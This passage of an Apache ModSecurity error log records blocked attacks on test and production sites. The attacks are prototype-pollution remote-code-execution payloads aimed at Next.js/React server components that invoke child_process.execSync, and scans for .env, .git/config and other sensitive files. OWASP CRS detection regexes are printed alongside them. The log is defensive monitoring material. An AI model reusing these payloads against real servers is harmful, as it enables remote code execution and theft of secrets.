_cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9Rtt8xMcTBghmXKuTsAAAABM"]
[Thu Dec 25 10:00:54.862632 2025] [:error] [pid 964249] [client 120.245.128.96:48814] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9Rtt8xMcTBghmXKuTsAAAABM"]
[Thu Dec 25 10:00:54.863844 2025] [:error] [pid 964249] [client 120.245.128.96:48814] [client 120.245.128.96] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9Rtt8xMcTBghmXKuTsAAAABM"]
[Thu Dec 25 10:00:54.864014 2025] [:error] [pid 964249] [client 120.245.128.96:48814] [client 120.245.128.96] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9Rtt8xMcTBghmXKuTsAAAABM"]
[Thu Dec 25 10:00:55.552774 2025] [:error] [pid 964237] [client 120.245.128.96:48908] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9R_W7LvgXGQX87MiXPwAAAAg"]
[Thu Dec 25 10:00:55.555177 2025] [:error] [pid 964237] [client 120.245.128.96:48908] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9R_W7LvgXGQX87MiXPwAAAAg"]
[Thu Dec 25 10:00:55.555256 2025] [:error] [pid 964237] [client 120.245.128.96:48908] [client 120.245.128.96] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9R_W7LvgXGQX87MiXPwAAAAg"]
[Thu Dec 25 10:00:55.556583 2025] [:error] [pid 964237] [client 120.245.128.96:48908] [client 120.245.128.96] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9R_W7LvgXGQX87MiXPwAAAAg"]
[Thu Dec 25 10:00:55.556771 2025] [:error] [pid 964237] [client 120.245.128.96:48908] [client 120.245.128.96] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUz9R_W7LvgXGQX87MiXPwAAAAg"]
[Thu Dec 25 14:26:00.158114 2025] [:error] [pid 963871] [client 18.183.179.185:37844] [client 18.183.179.185] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU07aKsqHORkuasgstYyKgAAAAE"]
[Thu Dec 25 14:26:00.158682 2025] [:error] [pid 963871] [client 18.183.179.185:37844] [client 18.183.179.185] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU07aKsqHORkuasgstYyKgAAAAE"]
[Thu Dec 25 14:26:00.159570 2025] [:error] [pid 963871] [client 18.183.179.185:37844] [client 18.183.179.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU07aKsqHORkuasgstYyKgAAAAE"]
[Thu Dec 25 14:26:00.159732 2025] [:error] [pid 963871] [client 18.183.179.185:37844] [client 18.183.179.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU07aKsqHORkuasgstYyKgAAAAE"]
[Thu Dec 25 16:20:41.785320 2025] [:error] [pid 964249] [client 18.181.195.40:49712] [client 18.181.195.40] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU1WSdt8xMcTBghmXKuUDAAAABM"]
[Thu Dec 25 16:20:41.785819 2025] [:error] [pid 964249] [client 18.181.195.40:49712] [client 18.181.195.40] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU1WSdt8xMcTBghmXKuUDAAAABM"]
[Thu Dec 25 16:20:41.786747 2025] [:error] [pid 964249] [client 18.181.195.40:49712] [client 18.181.195.40] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU1WSdt8xMcTBghmXKuUDAAAABM"]
[Thu Dec 25 16:20:41.786909 2025] [:error] [pid 964249] [client 18.181.195.40:49712] [client 18.181.195.40] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aU1WSdt8xMcTBghmXKuUDAAAABM"]
[Thu Dec 25 16:47:02.458393 2025] [:error] [pid 963872] [client 139.59.224.88:46724] [client 139.59.224.88] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU1cdtjBdh394N7tZIPl8AAAAAI"]
[Thu Dec 25 16:47:02.458690 2025] [:error] [pid 963872] [client 139.59.224.88:46724] [client 139.59.224.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU1cdtjBdh394N7tZIPl8AAAAAI"]
[Thu Dec 25 16:47:02.458869 2025] [:error] [pid 963872] [client 139.59.224.88:46724] [client 139.59.224.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU1cdtjBdh394N7tZIPl8AAAAAI"]
[Thu Dec 25 19:32:51.694239 2025] [:error] [pid 964235] [client 204.76.203.25:58786] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU2DU7wXLJzCQjhMY5aYZgAAAAY"]
[Thu Dec 25 19:32:51.694516 2025] [:error] [pid 964235] [client 204.76.203.25:58786] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU2DU7wXLJzCQjhMY5aYZgAAAAY"]
[Thu Dec 25 19:32:51.694680 2025] [:error] [pid 964235] [client 204.76.203.25:58786] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU2DU7wXLJzCQjhMY5aYZgAAAAY"]
[Fri Dec 26 04:29:45.247597 2025] [authz_core:error] [pid 987281] [client 206.189.225.181:37482] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 26 04:29:48.203876 2025] [:error] [pid 987016] [client 206.189.225.181:37496] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4BLPtV0DSD9Vsv4Ep7FAAAAAE"]
[Fri Dec 26 04:29:48.204104 2025] [:error] [pid 987016] [client 206.189.225.181:37496] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4BLPtV0DSD9Vsv4Ep7FAAAAAE"]
[Fri Dec 26 04:29:48.204264 2025] [:error] [pid 987016] [client 206.189.225.181:37496] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aU4BLPtV0DSD9Vsv4Ep7FAAAAAE"]
[Fri Dec 26 04:29:49.204194 2025] [:error] [pid 987021] [client 206.189.225.181:38808] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4BLQALvSk8syxFzC_S7wAAAAU"]
[Fri Dec 26 04:29:49.204429 2025] [:error] [pid 987021] [client 206.189.225.181:38808] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4BLQALvSk8syxFzC_S7wAAAAU"]
[Fri Dec 26 04:29:49.204583 2025] [:error] [pid 987021] [client 206.189.225.181:38808] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aU4BLQALvSk8syxFzC_S7wAAAAU"]
[Fri Dec 26 04:29:51.208254 2025] [:error] [pid 987015] [client 206.189.225.181:38824] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4BL0k2h_39dq1WaM9c1QAAAAA"]
[Fri Dec 26 04:29:51.208481 2025] [:error] [pid 987015] [client 206.189.225.181:38824] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4BL0k2h_39dq1WaM9c1QAAAAA"]
[Fri Dec 26 04:29:51.208649 2025] [:error] [pid 987015] [client 206.189.225.181:38824] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aU4BL0k2h_39dq1WaM9c1QAAAAA"]
[Fri Dec 26 05:20:25.049453 2025] [authz_core:error] [pid 988136] [client 159.65.144.72:37058] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
